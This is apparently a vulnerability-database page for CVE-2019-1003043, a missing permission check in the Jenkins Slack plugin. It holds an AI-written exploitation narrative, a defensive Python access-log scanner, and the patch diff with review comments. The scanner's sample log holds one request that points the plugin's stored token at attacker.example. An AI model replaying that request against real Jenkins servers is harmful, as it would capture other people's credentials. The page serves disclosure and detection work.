VYPR
Moderate severity · NVD Advisory · Published Mar 28, 2019 · Updated Aug 5, 2024

CVE-2019-1003043

Description

Jenkins Slack Notification Plugin 2.19 and earlier lacks a permission check, allowing attackers with Overall/Read to capture stored credentials via a crafted URL.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Vulnerability

A missing permission check in Jenkins Slack Notification Plugin 2.19 and earlier [1][2][3] allows attackers with Overall/Read permission to make the plugin connect to an attacker-specified URL using credential IDs they obtained through another method, thereby capturing credentials stored in Jenkins [3]. The flaw is in a form validation method (doTestConnection) that performed no permission check [3].

Exploitation

An attacker must have Overall/Read access to the Jenkins instance [2][3]. The attacker first obtains credential IDs through another method (for example, another vulnerability or an information disclosure). The attacker then sends a request to the vulnerable form validation endpoint, specifying a URL under their control and the obtained credential IDs [3]. The plugin connects to the attacker's URL using those credentials, which sends the credential values (for example, secret text tokens) to the attacker [3]. Because the form validation method also did not require POST requests, the same request could be triggered via CSRF (CVE-2019-1003044) by tricking an administrator into visiting a malicious link [3].

Impact

Successful exploitation allows an attacker to capture Jenkins credentials stored as secret text or similar, potentially gaining access to Slack workspaces or other services, or escalating privileges within Jenkins [2][3]. The plaintext credential values arrive at the attacker-specified URL, where the attacker collects them [3].

Mitigation

Jenkins released Slack Notification Plugin version 2.20 (part of the 2019-03-25 security advisory), which adds proper permission checks and CSRF protection [3]. Users should upgrade to version 2.20 or later; the references mention no workaround other than upgrading. The vulnerability was not listed in CISA's Known Exploited Vulnerabilities (KEV) catalog as of the publication date.
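As an added defender-side example (not from the advisory, the NVD record or the plugin project), the Python below scans constructed NCSA-style Jenkins access-log lines for requests to the testConnection form-validation endpoint described in the Exploitation section that arrive by a non-POST method or carry a baseUrl outside slack.com, the two signals the 2.20 fix closes. The /descriptorByName/.../testConnection path form is an assumption derived from Stapler's doXxx routing; the advisory itself names only the Java method.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumed Stapler routing of the descriptor's doTestConnection method (hypothetical
# path pattern; the advisory and diff name only the Java method).
ENDPOINT_RE = re.compile(r"/descriptorByName/[^/]*[Ss]lack[^/]*/testConnection$")
EXPECTED_HOST = "slack.com"  # the only host the plugin should be asked to contact
NCSA_RE = re.compile(r'(?P<ip>\S+) \S+ (?P<user>\S+) \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})')

def suspicious_reasons(method, target):
    """Explain why a testConnection request looks abusive; empty list if benign or unrelated."""
    url = urlsplit(target)
    if not ENDPOINT_RE.search(url.path):
        return []
    params = parse_qs(url.query)
    reasons = []
    # Before 2.20 the method accepted any verb; the fix adds @POST, so a GET is a probe signature.
    if method != "POST":
        reasons.append("non-POST method")
    base = params.get("baseUrl", [""])[0]
    host = urlsplit(base).hostname or ""
    # A baseUrl outside Slack means the stored token would be sent to that host.
    if base and host != EXPECTED_HOST and not host.endswith("." + EXPECTED_HOST):
        reasons.append("baseUrl host is " + (host or base))
    if reasons and params.get("tokenCredentialId"):
        reasons.append("credential ID " + params["tokenCredentialId"][0] + " supplied")
    return reasons

def scan(lines):
    """Return (user, method, reasons) for each NCSA-style access-log line that is flagged."""
    findings = []
    for line in lines:
        m = NCSA_RE.match(line)
        if not m:
            continue  # unparseable line, skip
        reasons = suspicious_reasons(m["method"], m["target"])
        if reasons:
            findings.append((m["user"], m["method"], reasons))
    return findings

# Constructed sample lines: a legitimate form test from the job config page, a GET probe
# pointing the token at a foreign host, and an unrelated page view.
SAMPLE_LOG = [
    '10.0.0.5 - alice [25/Mar/2019:10:15:30 +0000] "POST /job/build1/descriptorByName/jenkins.plugins.slack.SlackNotifier/testConnection?baseUrl=https%3A%2F%2Fslack.com%2Fapi%2F&teamDomain=acme&tokenCredentialId=slack-token&botUser=false&room=%23ci HTTP/1.1" 200 45',
    '203.0.113.9 - mallory [25/Mar/2019:10:16:02 +0000] "GET /descriptorByName/jenkins.plugins.slack.SlackNotifier/testConnection?baseUrl=https%3A%2F%2Fattacker.example%2F&teamDomain=acme&tokenCredentialId=slack-token&botUser=false&room=%23ci HTTP/1.1" 200 45',
    '10.0.0.7 - bob [25/Mar/2019:10:17:00 +0000] "GET /job/build1/ HTTP/1.1" 200 9876',
]
```

Running scan(SAMPLE_LOG) flags only mallory's GET; on a patched instance the same request is rejected by @POST, so the rule is mainly useful for hunting attempts made before the upgrade.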

AI Insight generated on May 22, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected packages

Versions sourced from the GitHub Security Advisory.

Package: org.jenkins-ci.plugins:slack (Maven)
Affected versions: < 2.20
Patched versions: 2.20

Affected products: 2

Patches (1)
Commit 0268bbefdcc2

SECURITY-976

https://github.com/jenkinsci/slack-plugin · Tim Jacomb · Mar 22, 2019 · via ghsa
1 file changed · +7 -0
  • src/main/java/jenkins/plugins/slack/SlackNotifier.java (+7 -0, modified)
    @@ -34,6 +34,7 @@
     import org.kohsuke.stapler.DataBoundSetter;
     import org.kohsuke.stapler.QueryParameter;
     import org.kohsuke.stapler.StaplerRequest;
    +import org.kohsuke.stapler.verb.POST;
     
     import java.util.NoSuchElementException;
     import java.util.function.Function;
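Review bot: only `org.kohsuke.stapler.verb.POST` is imported here, yet the second hunk introduces `Jenkins.get()` and `Item.CONFIGURE`; if `jenkins.model.Jenkins` and `hudson.model.Item` are not already imported elsewhere in this import block, the patch will not compile, so confirm those imports exist outside the shown context.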
    @@ -639,12 +640,18 @@ public String getDisplayName() {
                 return PLUGIN_DISPLAY_NAME;
             }
     
    +        @POST
             public FormValidation doTestConnection(@QueryParameter("baseUrl") final String baseUrl,
                                                    @QueryParameter("teamDomain") final String teamDomain,
                                                    @QueryParameter("tokenCredentialId") final String tokenCredentialId,
                                                    @QueryParameter("botUser") final boolean botUser,
                                                    @QueryParameter("room") final String room,
                                                    @AncestorInPath Project project) {
    +            if (project == null) {
    +                Jenkins.get().checkPermission(Jenkins.ADMINISTER);
    +            } else {
    +                project.checkPermission(Item.CONFIGURE);
    +            }
     
                 try {
                     String targetUrl = baseUrl;
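Review bot: the new check keys on whether `@AncestorInPath Project project` resolved, requiring Overall/Administer for the global-configuration path and Item/Configure on the job otherwise, but `baseUrl` and `tokenCredentialId` are still taken verbatim from the query, so a user with Configure on a single job can still point the test at any host with any credential ID; the body after `String targetUrl = baseUrl;` should be reviewed to ensure the credential lookup is scoped to what that project may use. Two smaller points: `Jenkins.get()` needs a core baseline of 2.98 or later, so check the plugin's declared core dependency, and a one-line comment above `@POST` noting that the annotation plus the permission check address both the missing check and the non-POST (CSRF) issue would help future readers.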
    

References (7)
